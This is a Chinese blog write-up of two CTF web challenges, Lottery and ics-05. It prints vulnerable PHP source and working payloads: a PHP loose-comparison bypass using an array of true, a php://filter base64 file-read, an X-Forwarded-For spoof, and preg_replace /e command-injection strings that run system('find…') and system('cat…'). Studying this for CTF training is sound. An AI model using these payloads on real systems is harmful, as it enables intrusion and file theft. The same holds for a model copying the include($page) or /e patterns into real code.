双剑破天门:攻防世界Web题解之独孤九剑心法(十)

于 2025-05-14 00:40:17 发布
阅读量1k 收藏 44
点赞数 48
分类专栏: CTF 文章标签: CTF-lottery CTF-ics-05 攻防世界 web 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w11111111152/article/details/147936814
版权

免责声明:用户因使用公众号内容而产生的任何行为和后果,由用户自行承担责任。本公众号不承担因用户误解、不当使用等导致的法律责任

**本文以攻防世界部分题为例进行演示,后续会对攻防世界大部分的web题目进行演示,如果你感兴趣请关注**

目录

一:Lottery

二:ics-05

三:总结

一:Lottery

打开后发现这个靶场加载异常缓慢,然后他还给了源码,我们先不看源码先熟悉一下这个网站是什么

这应该是一个类似猜数字游戏,选对7个号码即可得到相应奖励

然后注册

随便输入7个数字发现一个也没中,白费2元

然后我们随便点击这个网站的功能发现如果想要flag需要有相对应的余额

我们这会的思路就是利用bp抓包看看能不能修改我们的余额

好像成功了,我们试一试能不能换flag

居然说没有足够的钱,这个方法不行只要将页面上的数字修改只要刷新就会变回原来的余额

居然不能修改余额那就看看在猜数字的页面有没有突破口,发现其访问了api.php我们继续代码审计

看到如下核心代码,首先随机生成七位数字(random_win_nums)然后将其赋值给$win_number。随后关键点就是他使用的是两个等号来判断我们传入的数字和随机生成的数字,既然这样那直接可以利用true绕过,因为不检查类型

代码如下

//部分代码
function random_num(){
	do {
		$byte = openssl_random_pseudo_bytes(10, $cstrong);
		$num = ord($byte);
	} while ($num >= 250);

	if(!$cstrong){
		response_error('server need be checked, tell admin');
	}
	
	$num /= 25;
	return strval(floor($num));
}

function random_win_nums(){
	$result = '';
	for($i=0; $i<7; $i++){
		$result .= random_num();
	}
	return $result;
}


function buy($req){
	require_registered();
	require_min_money(2);

	$money = $_SESSION['money'];
	$numbers = $req['numbers'];
	$win_numbers = random_win_nums();
	$same_count = 0;
	for($i=0; $i<7; $i++){
		if($numbers[$i] == $win_numbers[$i]){
			$same_count++;
		}
	}
	switch ($same_count) {
		case 2:
			$prize = 5;
			break;
		case 3:
			$prize = 20;
			break;
		case 4:
			$prize = 300;
			break;
		case 5:
			$prize = 1800;
			break;
		case 6:
			$prize = 200000;
			break;
		case 7:
			$prize = 5000000;
			break;
		default:
			$prize = 0;
			break;
	}
	$money += $prize - 2;
	$_SESSION['money'] = $money;
	response(['status'=>'ok','numbers'=>$numbers, 'win_numbers'=>$win_numbers, 'money'=>$money, 'prize'=>$prize]);
}

抓到其流量包我们拦截回应包修改

利用php的弱类型比较

直接将numbers字段改为[true,true,true,true,true,true,true]

成功利用弱类型得到奖金

成功拿到flag

二:ics-05

打开如下所示

随便点击发现只有此页面可打开,但是好像什么都没有,我们打开页面源代码查看一下

发现一个href可点

打开如下,好像没什么特别的

我们修改其为index.php回显ok,既然这样那么如果我们能够读取到这个index.php应该就可以拿到flag

读取文件使用伪协议

php://filter/read=convert.base64-encode/resource=index.php

复制这个base64然后解密

打开代码后观察如下代码

如果ip为127.0.0.1就是admin,然后还有一个preg_replace方法,pattern第一个参数的结尾包含了/e修正符的话,第二个参数就会被当做php代码执行

打开bp,修改ip后为admin

然后添加三个参数

?pat=/heihei/e&rep=system('find+-name+*flag*')&sub=heihei

需要使用+置换空格 得到flag.php

成功拿到flag但注意flag不在页面渲染中显示

?pat=/heihei/e&rep=system('cat+./s3chahahaDir/flag/flag.php')&sub=heihei

解密后的index.php代码

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设备维护中心</title>
    <meta charset="utf-8">
</head>

<body>
<ul class="layui-nav">
    <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
</ul>
<fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
    <legend>设备列表</legend>
</fieldset>
<table class="layui-hide" id="test"></table>
<script type="text/html" id="switchTpl">
    <!-- 这里的 checked 的状态只是演示 -->
    <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
</script>
<script src="layui/layui.js" charset="utf-8"></script>
<script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;

        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                    { type: 'checkbox' },
                    { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                    { field: 'name', title: '设备名', templet: '#nameTpl' },
                    { field: 'area', title: '区域' },
                    { field: 'status', title: '维护状态', minWidth: 120, sort: true },
                    { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
</script>
<script>
    layui.use('element', function() {
        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
</script>

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

<br /><br /><br /><br />
<div style="text-align:center">
    <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

    <?php

    }else{

    ?>
    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead">
            <?php

            if (strpos($page, 'input') > 0) {
                die();
            }

            if (strpos($page, 'ta:text') > 0) {
                die();
            }

            if (strpos($page, 'text') > 0) {
                die();
            }

            if ($page === 'index.php') {
                die('Ok');
            }
            include($page);
            die();
            ?>
        </p>
        <br /><br /><br /><br />

        <?php
        }}


        //方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

        if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

            echo "<br >Welcome My Admin ! <br >";

            $pattern = $_GET[pat];
            $replacement = $_GET[rep];
            $subject = $_GET[sub];

            if (isset($pattern) && isset($replacement) && isset($subject)) {
                preg_replace($pattern, $replacement, $subject);
            }else{
                die();
            }

        }





        ?>

</body>

</html>

三:总结

本文通过攻防世界中的两个Web题目(Lottery和ics-05)演示了如何利用代码审计和漏洞挖掘技术获取flag。在Lottery题目中,通过分析网站的猜数字游戏功能,发现使用PHP的弱类型比较漏洞,成功绕过验证并获取奖金和flag。在ics-05题目中,通过修改IP地址和利用PHP的preg_replace函数执行系统命令,成功读取并解密index.php文件,最终获取flag。

(需要源代码及各类资料联系博主免费领取!!还希望多多关注点赞支持,你的支持就是我的最大动力!!!)

攻防世界(web)---warmup
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
12-30 1643
攻防世界—warmup 文章目录攻防世界---warmup目 php代码审计用到的php知识highlight_file(__FILE__) 目 php代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php
攻防世界 CTF Web方向 引导模式-难度1 —— 11-20 wp精讲
qq_62564422的博客
02-09 1160
a为%61, 传入%61dmin,发现直接被浏览器解码为admin,影响了后续的判断,于是对%再次编码,传入%2561dmin。含有flag的页面与不含的页面返回内容长度不同,进行长度排序发现id=2333时长度不同,找到返回内容,发现flag。目描述: 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。O代表结构类型为类:4表示类名长度:类名:类的属性个数:{属性名类型:长度:名称;分析序列化字符串 O:4:"xctf":1:{s:4:"flag";
攻防世界——Web攻防笔记
Dark0518的博客
11-18 565
第一:view_source 学习chrome打开开发者工具的快捷键,用F12即可,Ctrl+u查看源代码,注意flag的格式为Cyberpeace{xxxxxxxx} 第二:get_post 关于HTTP的两种请求方式get和post 具体实现需要一个Hackbar的插件,在Firefox 或Chrome添加即可 再根据提示一次完成,即可得出flag HTTP中GET和POST两种请求方式的区别: GET:Web浏览器将各表单字段名称及其值按照URL参数格式的形式,附在action属性指定的URL
攻防世界Web新手练习篇
m0_63944500的博客
11-19 3038
写给刚接触CTF的萌新,感谢支持,谨以此文献给去年的自己。
攻防世界web新手知识点WriteUP及知识点讲解(超超超详细)
qq_62604985的博客
09-19 1527
在url处进入 /robots.txt 查看到以下页面。尝试访问fl0g.php文件得到flag。
CTF wed安全攻防世界)练习_ctfweb
最新发布
Innocence_0的博客
05-24 933
进入网站如图:翻译:在这个小小的挑战训练中,你将学习Robots exclusionstandard。网络爬虫使用robots.txt文件来检查它们是否被允许抓取和索引您的网站或只是其中的一部分。有时这些文件会暴露目录结构,而不是保护内容不被抓取。好好享受吧!**步骤一:**进入robots.txt文件,如图:**步骤二:**得到/f10g.php,在进入这里面得到flag提交即可成功!!!
攻防世界新手模式例Web
2301_79688134的博客
03-18 1670
首先我们查看页面,查看前端代码发现均没有什么有效信息,由目可知,此问与php相关,于是我们可以看一下他的index.php文件查看时用?index.phps补充知识:phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。得到了php源码,判断此处应该是代码审计问。这一段代码表明,经过url解码后的id不能等于admin,否则将会直接退出。
攻防世界web新手区easyphp题解writeup
weixin_46906325的博客
10-03 8496
攻防世界web新手区easyphp题解
CTF-WEB攻防世界目实战解析easyupload
2301_76565920的博客
04-23 2348
目:easyupload 难度:1知识点:上传漏洞,服务器防护绕过,后门,.user.ini,auto_prepend_file的使用
攻防世界Web - unseping 总结
weixin_62871152的博客
11-02 3127
攻防世界-WEB
攻防世界 web新手练习区题解
weixin_46330722的博客
10-29 1540
攻防世界 web新手练习区题解 上view_sourcerobots前置知识-robots协议解backupcookiedisabled_buttonweak_auth view_source 目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 从目描述就知道是让我们查看网页源代码,但是又说鼠标右键坏了,那么就可以f12一件查看源码 成功拿到flag robots 目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。
2024年网络安全最新CTF_WP-攻防世界web题解(1),2024年最新这原因我服了
2401_84264692的博客
05-07 1658
参考:https://www.cnblogs.com/gradyblog/p/16989750.html查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile。
攻防世界Web新手区题解(超详细)
weixin_52385170的博客
06-21 7959
Web新手区题解
buuoj、xmctf攻防世界web)write up
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
攻防世界web总结A
MIGENGKING的博客
08-06 644
1: 思路:目说右键用不了,因为打开右键可以查看网页的代码,所以我们要想办法打开网页大源代码: 复制链接在浏览器上打开: 因为右键用不了:我们可以按一下快捷键: 1):可以直接按“F12”(不过有些电脑不可以,需要按“Fn+F12”) 2):直接按“Ctrl+u” 打开源代码后发现了flag的一般形式:所以就去验证然后就对了。这道很简单。 2: 目应该是get和post传参: PO...
攻防世界——web新手
weixin_46204746的博客
02-10 992
攻防世界————web新手 1. robots 打开目场景,发现与robots协议有关,上网搜索robots协议的内容: Robots协议(也称为爬虫协议、机器人协议等)的全称是“网络爬虫排除标准”(Robots Exclusion Protocol),网站通过Robots协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取。Robots协议的本质是网站和搜索引擎爬...
攻防世界 web
qq_41071646的博客
05-30 1141
最近无事 想刷刷web 来玩玩 不想看pwn还有re~~~ 复习什么的 也不是干@@@@@@ 然后刷的平台攻防世界 毕竟感觉哪里的 感觉适合入手 robots 这个协议我确实知道 在学习python 爬虫的时候看的 如果 你不想让搜索引擎来 爬取你网站的信息的话 可以在网站上的 robots.txt 写上这些引擎 (当然对大公司有约束 一般人写爬虫 是不怎么遵守这个约定的)...
攻防世界web新手题解writeup
devilare的博客
09-09 2766
攻防世界web新手 1.view_source 目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 目场景: http://220.249.52.133:58537初级,按下F12查看网页源码得到flag 2.get_post 目描述:X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗? 目场景: http://220.249.52.133:35963打开场景发现提示在域名栏输入**/?a=1**得到新的提示 这里我们可以用到一个火狐插件Max Ha
攻防世界——web高手进阶区题解
热门推荐
小锤队长的博客
10-01 3万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
评论 46
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全瞭望Sec

感谢您的打赏,您的支持让我更加

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值